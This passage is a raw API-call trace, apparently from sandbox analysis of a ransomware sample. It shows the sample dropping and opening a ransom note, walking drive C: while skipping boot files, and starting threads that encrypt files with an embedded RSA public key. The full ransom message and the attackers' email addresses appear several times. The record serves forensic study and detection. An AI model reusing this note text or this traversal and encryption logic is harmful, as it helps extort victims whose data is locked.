(lpOutputString="END2") [0225.644] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1811b4, csidl=0, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0225.645] wsprintfW (in: param_1=0x1813bc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_HELP_INSTRUCTION.TXT") returned 59 [0225.645] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_help_instruction.txt")) returned 1 [0225.645] SetErrorMode (uMode=0x1) returned 0x1 [0225.646] wsprintfW (in: param_1=0x18075c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_HELP_INSTRUCTION.TXT") returned 59 [0225.646] GetUserNameW (in: lpBuffer=0x17e538, pcbBuffer=0x17e324 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17e324) returned 1 [0225.646] wsprintfW (in: param_1=0x17e330, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0225.646] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17e32c | out: phkResult=0x17e32c*=0x100c) returned 0x0 [0225.646] RegQueryValueExW (in: hKey=0x100c, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cae3d8, lpcbData=0x17e328*=0x104 | out: lpType=0x0, lpData=0x3cae3d8*=0x65, lpcbData=0x17e328*=0x4a) returned 0x0 [0225.646] RegCloseKey (hKey=0x100c) returned 0x0 [0225.646] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17f75c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0225.646] wsprintfW (in: param_1=0x17e75c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0225.646] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0225.646] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100c [0225.647] WriteFile (in: hFile=0x100c, lpBuffer=0x17e75c*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x17e754, lpOverlapped=0x0 | out: lpBuffer=0x17e75c*, lpNumberOfBytesWritten=0x17e754*=0x2c4, lpOverlapped=0x0) returned 1 [0225.647] CloseHandle (hObject=0x100c) returned 1 [0225.647] ShellExecuteW (hwnd=0x0, lpOperation="open", lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_HELP_INSTRUCTION.TXT", lpParameters=0x0, lpDirectory=0x0, nShowCmd=5) returned 0x2a [0225.735] OutputDebugStringA (lpOutputString="START1") [0225.735] SetErrorMode (uMode=0x1) returned 0x1 [0225.735] GetLogicalDriveStringsW (in: nBufferLength=0x34, lpBuffer=0x1815f8 | out: lpBuffer="C:\\") returned 0x4 [0225.735] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:" | out: lpString1="C:") returned="C:" [0225.735] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0225.736] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\" | out: lpString1="C:\\") returned="C:\\" [0225.736] lstrcatW (in: lpString1="C:\\", lpString2="*.*" | out: lpString1="C:\\*.*") returned="C:\\*.*" [0225.736] FindFirstFileW (in: lpFileName="C:\\*.*", lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 0x4372378 [0225.736] PathFindFileNameW (pszPath="C:") returned="C:" [0225.736] lstrcpyW (in: lpString1=0x17f8c4, lpString2="C:" | out: lpString1="C:") returned="C:" [0225.736] StrStrW (lpFirst="B0AD3AB92537B4FBFE37930729309943.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0225.736] StrStrW (lpFirst="B0AD3AB92537B4FBFE37930729309943.XZZX", lpSrch="ntldr") returned 0x0 [0225.736] StrStrW (lpFirst="B0AD3AB92537B4FBFE37930729309943.XZZX", lpSrch="NTLDR") returned 0x0 [0225.736] StrStrW (lpFirst="B0AD3AB92537B4FBFE37930729309943.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0225.736] StrStrW (lpFirst="B0AD3AB92537B4FBFE37930729309943.XZZX", lpSrch="ntdetect.com") returned 0x0 [0225.736] StrStrW (lpFirst="C:\\", lpSrch="Desktop") returned 0x0 [0225.736] StrStrW (lpFirst="C:\\", lpSrch="DESKTOP") returned 0x0 [0225.736] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\") returned 7 [0225.736] lstrcpyA (in: lpString1=0x17fafc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0225.736] lstrcpyW (in: lpString1=0x1800fc, lpString2="B0AD3AB92537B4FBFE37930729309943.XZZX" | out: lpString1="B0AD3AB92537B4FBFE37930729309943.XZZX") returned="B0AD3AB92537B4FBFE37930729309943.XZZX" [0225.736] lstrcpyW (in: lpString1=0x17fcfc, lpString2="\\\\?\\C:\\" | out: lpString1="\\\\?\\C:\\") returned="\\\\?\\C:\\" [0225.736] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17fafc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1010 [0225.736] Sleep (dwMilliseconds=0x96) [0225.880] FindNextFileW (in: hFindFile=0x4372378, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0225.880] FindNextFileW (in: hFindFile=0x4372378, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0225.880] lstrcmpW (lpString1="bootmgr", lpString2="..") returned 1 [0225.880] lstrcmpW (lpString1="bootmgr", lpString2=".") returned 1 [0225.880] StrStrW (lpFirst="bootmgr", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0225.880] StrStrW (lpFirst="bootmgr", lpSrch="ntldr") returned 0x0 [0225.880] StrStrW (lpFirst="bootmgr", lpSrch="NTLDR") returned 0x0 [0225.880] StrStrW (lpFirst="bootmgr", lpSrch="NTDETECT.COM") returned 0x0 [0225.880] StrStrW (lpFirst="bootmgr", lpSrch="ntdetect.com") returned 0x0 [0225.880] StrStrW (lpFirst="C:\\", lpSrch="Desktop") returned 0x0 [0225.880] StrStrW (lpFirst="C:\\", lpSrch="DESKTOP") returned 0x0 [0225.880] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\") returned 7 [0225.880] lstrcpyA (in: lpString1=0x17fafc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0225.880] lstrcpyW (in: lpString1=0x1800fc, lpString2="bootmgr" | out: lpString1="bootmgr") returned="bootmgr" [0225.880] lstrcpyW (in: lpString1=0x17fcfc, lpString2="\\\\?\\C:\\" | out: lpString1="\\\\?\\C:\\") returned="\\\\?\\C:\\" [0225.880] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17fafc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x107c [0225.881] Sleep (dwMilliseconds=0x96) [0226.034] FindNextFileW (in: hFindFile=0x4372378, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0226.034] FindNextFileW (in: hFindFile=0x4372378, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0226.034] FindNextFileW (in: hFindFile=0x4372378, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0226.034] lstrcmpW (lpString1="hiberfil.sys", lpString2="..") returned 1 [0226.034] lstrcmpW (lpString1="hiberfil.sys", lpString2=".") returned 1 [0226.034] StrStrW (lpFirst="hiberfil.sys", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0226.034] StrStrW (lpFirst="hiberfil.sys", lpSrch="ntldr") returned 0x0 [0226.034] StrStrW (lpFirst="hiberfil.sys", lpSrch="NTLDR") returned 0x0 [0226.034] StrStrW (lpFirst="hiberfil.sys", lpSrch="NTDETECT.COM") returned 0x0 [0226.034] StrStrW (lpFirst="hiberfil.sys", lpSrch="ntdetect.com") returned 0x0 [0226.034] StrStrW (lpFirst="C:\\", lpSrch="Desktop") returned 0x0 [0226.034] StrStrW (lpFirst="C:\\", lpSrch="DESKTOP") returned 0x0 [0226.034] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\") returned 7 [0226.034] lstrcpyA (in: lpString1=0x17fafc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0226.034] lstrcpyW (in: lpString1=0x1800fc, lpString2="hiberfil.sys" | out: lpString1="hiberfil.sys") returned="hiberfil.sys" [0226.034] lstrcpyW (in: lpString1=0x17fcfc, lpString2="\\\\?\\C:\\" | out: lpString1="\\\\?\\C:\\") returned="\\\\?\\C:\\" [0226.034] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17fafc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x105c [0226.034] Sleep (dwMilliseconds=0x96) [0226.190] FindNextFileW (in: hFindFile=0x4372378, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0226.190] FindNextFileW (in: hFindFile=0x4372378, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0226.190] lstrcmpW (lpString1="pagefile.sys", lpString2="..") returned 1 [0226.190] lstrcmpW (lpString1="pagefile.sys", lpString2=".") returned 1 [0226.190] StrStrW (lpFirst="pagefile.sys", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0226.190] StrStrW (lpFirst="pagefile.sys", lpSrch="ntldr") returned 0x0 [0226.190] StrStrW (lpFirst="pagefile.sys", lpSrch="NTLDR") returned 0x0 [0226.190] StrStrW (lpFirst="pagefile.sys", lpSrch="NTDETECT.COM") returned 0x0 [0226.190] StrStrW (lpFirst="pagefile.sys", lpSrch="ntdetect.com") returned 0x0 [0226.190] StrStrW (lpFirst="C:\\", lpSrch="Desktop") returned 0x0 [0226.190] StrStrW (lpFirst="C:\\", lpSrch="DESKTOP") returned 0x0 [0226.190] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\") returned 7 [0226.190] lstrcpyA (in: lpString1=0x17fafc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0226.190] lstrcpyW (in: lpString1=0x1800fc, lpString2="pagefile.sys" | out: lpString1="pagefile.sys") returned="pagefile.sys" [0226.190] lstrcpyW (in: lpString1=0x17fcfc, lpString2="\\\\?\\C:\\" | out: lpString1="\\\\?\\C:\\") returned="\\\\?\\C:\\" [0226.190] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17fafc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1060 [0226.191] Sleep (dwMilliseconds=0x96) [0226.346] FindNextFileW (in: hFindFile=0x4372378, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0226.346] FindNextFileW (in: hFindFile=0x4372378, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0226.346] FindNextFileW (in: hFindFile=0x4372378, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0226.346] FindNextFileW (in: hFindFile=0x4372378, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0226.346] FindNextFileW (in: hFindFile=0x4372378, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0226.346] FindNextFileW (in: hFindFile=0x4372378, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0226.346] FindNextFileW (in: hFindFile=0x4372378, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0226.346] FindNextFileW (in: hFindFile=0x4372378, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0226.346] FindNextFileW (in: hFindFile=0x4372378, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0226.346] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0226.346] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0226.346] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0226.346] FindNextFileW (in: hFindFile=0x4372378, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 0 [0226.346] FindClose (in: hFindFile=0x4372378 | out: hFindFile=0x4372378) returned 1 [0226.346] FindClose (in: hFindFile=0x4372378 | out: hFindFile=0x4372378) returned 0 [0226.346] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:" | out: lpString1="C:") returned="C:" [0226.346] lstrcatW (in: lpString1="C:", lpString2="\\*.*" | out: lpString1="C:\\*.*") returned="C:\\*.*" [0226.346] StrStrW (lpFirst="C:\\", lpSrch="Desktop") returned 0x0 [0226.346] StrStrW (lpFirst="C:\\", lpSrch="DESKTOP") returned 0x0 [0226.346] SetErrorMode (uMode=0x1) returned 0x1 [0226.346] wsprintfW (in: param_1=0x17f6bc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\_HELP_INSTRUCTION.TXT") returned 24 [0226.346] GetUserNameW (in: lpBuffer=0x17d498, pcbBuffer=0x17d284 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17d284) returned 1 [0226.347] wsprintfW (in: param_1=0x17d290, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0226.347] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17d28c | out: phkResult=0x17d28c*=0x1058) returned 0x0 [0226.347] RegQueryValueExW (in: hKey=0x1058, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cae608, lpcbData=0x17d288*=0x104 | out: lpType=0x0, lpData=0x3cae608*=0x65, lpcbData=0x17d288*=0x4a) returned 0x0 [0226.347] RegCloseKey (hKey=0x1058) returned 0x0 [0226.347] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17e6bc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0226.347] wsprintfW (in: param_1=0x17d6bc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0226.347] CreateFileW (lpFileName="C:\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1058 [0226.347] CloseHandle (hObject=0x1058) returned 1 [0226.347] FindFirstFileW (in: lpFileName="C:\\*.*", lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 0x4372378 [0226.347] PathFindFileNameW (pszPath="C:") returned="C:" [0226.347] lstrcpyW (in: lpString1=0x17f8c4, lpString2="C:" | out: lpString1="C:") returned="C:" [0226.347] lstrcpyW (in: lpString1=0x180750, lpString2="C:" | out: lpString1="C:") returned="C:" [0226.347] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0226.348] lstrcatW (in: lpString1="C:\\", lpString2="$Recycle.Bin" | out: lpString1="C:\\$Recycle.Bin") returned="C:\\$Recycle.Bin" [0226.348] SetErrorMode (uMode=0x1) returned 0x1 [0226.348] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\$Recycle.Bin" | out: lpString1="C:\\$Recycle.Bin") returned="C:\\$Recycle.Bin" [0226.348] lstrcatW (in: lpString1="C:\\$Recycle.Bin", lpString2="\\" | out: lpString1="C:\\$Recycle.Bin\\") returned="C:\\$Recycle.Bin\\" [0226.348] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\$Recycle.Bin\\" | out: lpString1="C:\\$Recycle.Bin\\") returned="C:\\$Recycle.Bin\\" [0226.348] lstrcatW (in: lpString1="C:\\$Recycle.Bin\\", lpString2="*.*" | out: lpString1="C:\\$Recycle.Bin\\*.*") returned="C:\\$Recycle.Bin\\*.*" [0226.348] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x43728b8 [0226.348] PathFindFileNameW (pszPath="C:\\$Recycle.Bin") returned="$Recycle.Bin" [0226.348] lstrcpyW (in: lpString1=0x17e824, lpString2="$Recycle.Bin" | out: lpString1="$Recycle.Bin") returned="$Recycle.Bin" [0226.348] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\$Recycle.Bin" | out: lpString1="C:\\$Recycle.Bin") returned="C:\\$Recycle.Bin" [0226.348] lstrcatW (in: lpString1="C:\\$Recycle.Bin", lpString2="\\*.*" | out: lpString1="C:\\$Recycle.Bin\\*.*") returned="C:\\$Recycle.Bin\\*.*" [0226.348] StrStrW (lpFirst="C:\\$Recycle.Bin\\", lpSrch="Desktop") returned 0x0 [0226.348] StrStrW (lpFirst="C:\\$Recycle.Bin\\", lpSrch="DESKTOP") returned 0x0 [0226.348] SetErrorMode (uMode=0x1) returned 0x1 [0226.348] wsprintfW (in: param_1=0x17e61c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\$Recycle.Bin\\_HELP_INSTRUCTION.TXT") returned 37 [0226.348] GetUserNameW (in: lpBuffer=0x17c3f8, pcbBuffer=0x17c1e4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17c1e4) returned 1 [0226.348] wsprintfW (in: param_1=0x17c1f0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0226.348] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17c1ec | out: phkResult=0x17c1ec*=0x1068) returned 0x0 [0226.348] RegQueryValueExW (in: hKey=0x1068, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cae838, lpcbData=0x17c1e8*=0x104 | out: lpType=0x0, lpData=0x3cae838*=0x65, lpcbData=0x17c1e8*=0x4a) returned 0x0 [0226.349] RegCloseKey (hKey=0x1068) returned 0x0 [0226.349] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17d61c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0226.349] wsprintfW (in: param_1=0x17c61c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0226.349] CreateFileW (lpFileName="C:\\$Recycle.Bin\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\$recycle.bin\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0226.349] CreateFileW (lpFileName="C:\\$Recycle.Bin\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\$recycle.bin\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0226.349] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x43728b8 [0226.349] PathFindFileNameW (pszPath="C:\\$Recycle.Bin") 